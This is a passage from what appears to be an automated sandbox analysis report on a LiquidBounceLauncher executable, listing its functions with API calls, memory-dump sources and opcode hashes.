                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: setlocale$memcpystrftimestrlen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1843691881-0
                                                                                                                                                                                      • Opcode ID: c2224580619679a714a3209dd4743c2cdcd153860dd8cbdb9ec72f0c33724d7d
                                                                                                                                                                                      • Instruction ID: 97b4ada625db74432463168d58f4bc351cc13a5e25ded8a16499774d429a5729
                                                                                                                                                                                      • Opcode Fuzzy Hash: c2224580619679a714a3209dd4743c2cdcd153860dd8cbdb9ec72f0c33724d7d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D11C5B16093109FC740BF69D48561FBBE4AF98754F81883EF4C887302E7B898448B56
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00425589 Relevance: 7.9, APIs: 2, Strings: 3, Instructions: 393COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                      • String ID: $!$5
                                                                                                                                                                                      • API String ID: 3510742995-3060263202
                                                                                                                                                                                      • Opcode ID: ac0b12d3f1aee56c7bf8a61aaf960173a8c07115870b813d757e68eb1e5b0573
                                                                                                                                                                                      • Instruction ID: 06b4f07f2fd40ced5843142796e5b9458c439ca5f1e8853c6a6e57fcd5c0752e
                                                                                                                                                                                      • Opcode Fuzzy Hash: ac0b12d3f1aee56c7bf8a61aaf960173a8c07115870b813d757e68eb1e5b0573
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7802F571A097518FD760DF29D580A5AFBE1BF88344F95892EE8C8C7311EB78E844CB46
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0041F2A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 183stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: strlen
                                                                                                                                                                                      • String ID: _$_GLOBAL_
                                                                                                                                                                                      • API String ID: 39653677-1011282467
                                                                                                                                                                                      • Opcode ID: 280ce45de13801b55f7d34f38a8a9695f6fa677a9c45be0a33ee50c2d4a90088
                                                                                                                                                                                      • Instruction ID: 4761600dfca3d3f6bf834b6629efb316014b04c832e538b93c21008828215f5c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 280ce45de13801b55f7d34f38a8a9695f6fa677a9c45be0a33ee50c2d4a90088
                                                                                                                                                                                      • Instruction Fuzzy Hash: BF812871D042288FEB20DF69D8943DEBBF1BF49308F4441AAD459AB341D7799A89CF81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00429909 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: atoisetlocalestrchr
                                                                                                                                                                                      • String ID: .
                                                                                                                                                                                      • API String ID: 1223908000-248832578
                                                                                                                                                                                      • Opcode ID: e65f4becda49b614b1ae9ecfcbccb279a57b594a1a656022a01b2fde0a25d866
                                                                                                                                                                                      • Instruction ID: ea299ac268a7516d58982514e56d5a787a70a3076d4c8d16fa6e7e6082fca631
                                                                                                                                                                                      • Opcode Fuzzy Hash: e65f4becda49b614b1ae9ecfcbccb279a57b594a1a656022a01b2fde0a25d866
                                                                                                                                                                                      • Instruction Fuzzy Hash: DA41E7B56083218BC720DF69E58161BBBE4AF88754F85492FE889D7300E778DD40CB46
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00429870 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: atoisetlocalestrchr
                                                                                                                                                                                      • String ID: .
                                                                                                                                                                                      • API String ID: 1223908000-248832578
                                                                                                                                                                                      • Opcode ID: 2c4b2f22cfa36492508dd32f5ca8ae22be70d02a375ab5e335289a9276af77c2
                                                                                                                                                                                      • Instruction ID: 3d3feb19c24e16660a5ee7c30b6669d4bab0d9e3c52f6bc25f11a339ec821b16
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c4b2f22cfa36492508dd32f5ca8ae22be70d02a375ab5e335289a9276af77c2
                                                                                                                                                                                      • Instruction Fuzzy Hash: CA0117B5A193118BD700EF29E08461BBBF1BF89704F84882EE88887305E779DC44DB46
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004202A9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ProtectVirtual$memcpy
                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                      • API String ID: 1565840913-2766056989
                                                                                                                                                                                      • Opcode ID: 43e6b3ebf733b809cd8c91941375f0d303317e84ef8ba7a7ed2a6e4b0a2d0997
                                                                                                                                                                                      • Instruction ID: ba924099be8c28db66181d4e62fba598765455691df64df5c56dea125af0db3c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 43e6b3ebf733b809cd8c91941375f0d303317e84ef8ba7a7ed2a6e4b0a2d0997
                                                                                                                                                                                      • Instruction Fuzzy Hash: 380192B56083059FD300EF29D18451EFBE0BF88744F90892EF49893315E234E9448F46
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004298FC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: atoisetlocalestrchr
                                                                                                                                                                                      • String ID: .
                                                                                                                                                                                      • API String ID: 1223908000-248832578
                                                                                                                                                                                      • Opcode ID: 6d40f3dcee62cf837c7da6bb4878877bebd925fd21747f16f009c84eb0dfa531
                                                                                                                                                                                      • Instruction ID: 1b53548aa863cf63440307cc1dc892197fabc5e8ca52f2bc2137f95cd76ccec8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d40f3dcee62cf837c7da6bb4878877bebd925fd21747f16f009c84eb0dfa531
                                                                                                                                                                                      • Instruction Fuzzy Hash: BA01D2B5A093118FC700EF29E08461BBBF1BF99708F85882EE48897315E779D8449B46
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0041F810 Relevance: 6.3, APIs: 5, Instructions: 93stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: freememcpystrlen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2208669145-0
                                                                                                                                                                                      • Opcode ID: ff9d4036c0d8dc5944c0b390549f4f666431dd74629a4eabe1bf114c9c02dcd8
                                                                                                                                                                                      • Instruction ID: 63eec1d3235c43bd10700c6755485854b0aa945be5c95da535e626d13795d613
                                                                                                                                                                                      • Opcode Fuzzy Hash: ff9d4036c0d8dc5944c0b390549f4f666431dd74629a4eabe1bf114c9c02dcd8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 82315AB16083128BD710AF56D5807ABBBE4AF91314F14093FE99487350D739D88FCB9A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0041E360 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: {default arg#$}::
                                                                                                                                                                                      • API String ID: 0-3706473490
                                                                                                                                                                                      • Opcode ID: ce555a00f1f986593c9324530e96fbfb91df8cbcf22090c6c3719b4e6fa337d6
                                                                                                                                                                                      • Instruction ID: cba8828bacbda7c27a470f6678d37d4f815e27edfa27baf86a88e1afe0a879ac
                                                                                                                                                                                      • Opcode Fuzzy Hash: ce555a00f1f986593c9324530e96fbfb91df8cbcf22090c6c3719b4e6fa337d6
                                                                                                                                                                                      • Instruction Fuzzy Hash: E3B15374608745CBC721DF29C0947EBBBE1AF94304F14882EE9DA8B301D779A8C5DB56
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0041B6B8 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: this${parm#$}
                                                                                                                                                                                      • API String ID: 0-3278767634
                                                                                                                                                                                      • Opcode ID: f0569842e73a880a493cc896572f3ce1d6a650e39fa2a201f6796a48a78b242e
                                                                                                                                                                                      • Instruction ID: 4285d5343fb99821ffbffc284303fc6a36447e7bdc4d45dd301d8b3082559f09
                                                                                                                                                                                      • Opcode Fuzzy Hash: f0569842e73a880a493cc896572f3ce1d6a650e39fa2a201f6796a48a78b242e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A512C7154D2818BCB118F28C4D43EA7BE1AF65304F1884BEDCC88F346D7B998C59B96
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004296E0 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsDBCSLeadByteEx.KERNEL32 ref: 00429735
                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32 ref: 00429777
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Byte$CharLeadMultiWide
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2561704868-0
                                                                                                                                                                                      • Opcode ID: 62a2faf36f5ee45a35151612c459aa05e8d0863d409edac67a0d2e4ac7529d0c
                                                                                                                                                                                      • Instruction ID: 4ac8806704cea831e81abceb4553886374e813f9a0d7362064d0e324fd7741b2
                                                                                                                                                                                      • Opcode Fuzzy Hash: 62a2faf36f5ee45a35151612c459aa05e8d0863d409edac67a0d2e4ac7529d0c
                                                                                                                                                                                      • Instruction Fuzzy Hash: C04117B06193608FD710EF29E48475BBBE0BF86314F84892EE89487391D37AD949CB47
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0041A9C8 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 101stringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: strcmp
                                                                                                                                                                                      • String ID: $ : $new
                                                                                                                                                                                      • API String ID: 1004003707-2075650739
                                                                                                                                                                                      • Opcode ID: c8e1303e4eac539b9dc9758e887e951c4a5c002fb04f7f7eebcc92cd2d993972
                                                                                                                                                                                      • Instruction ID: 9b29d09f3482d7f8d5fd0cf2a394de155981f80384d4d423a353c846a127a09c
                                                                                                                                                                                      • Opcode Fuzzy Hash: c8e1303e4eac539b9dc9758e887e951c4a5c002fb04f7f7eebcc92cd2d993972
                                                                                                                                                                                      • Instruction Fuzzy Hash: B9415D747083018BC700DF19D4946AAB7E1AFD8314F08847EEC898B356DB78DC89CB95
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0042B0F0 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • localeconv.MSVCRT ref: 0042B112
                                                                                                                                                                                      • _strdup.MSVCRT(?,?,?,?,?,?,?,?,0042B889), ref: 0042B11D
                                                                                                                                                                                      • localeconv.MSVCRT ref: 0042B13C
                                                                                                                                                                                      • free.MSVCRT(?,?,?,?,?,?,?,?,0042B889), ref: 0042B195
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: localeconv$_strdupfree
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 611303462-0
                                                                                                                                                                                      • Opcode ID: 9e1881c8929fd6ff0445c3d7695892d567f5a22a5e3fe5680f1f7506e94fb45b
                                                                                                                                                                                      • Instruction ID: b6dd00f0c225cf969ca863c57b5961a6af20a1fafbe28bab0e968286e224fbb6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e1881c8929fd6ff0445c3d7695892d567f5a22a5e3fe5680f1f7506e94fb45b
                                                                                                                                                                                      • Instruction Fuzzy Hash: B01181B06087308EC720DF26A444637B7E0EF48394F948A2EE8C987351E378D495DB99
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0042B10C Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • localeconv.MSVCRT ref: 0042B112
                                                                                                                                                                                      • _strdup.MSVCRT(?,?,?,?,?,?,?,?,0042B889), ref: 0042B11D
                                                                                                                                                                                      • localeconv.MSVCRT ref: 0042B13C
                                                                                                                                                                                        • Part of subcall function 00429870: setlocale.MSVCRT ref: 0042989A
                                                                                                                                                                                        • Part of subcall function 00429870: strchr.MSVCRT ref: 004298AA
                                                                                                                                                                                        • Part of subcall function 00429870: atoi.MSVCRT ref: 004298BD
                                                                                                                                                                                      • free.MSVCRT(?,?,?,?,?,?,?,?,0042B889), ref: 0042B195
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
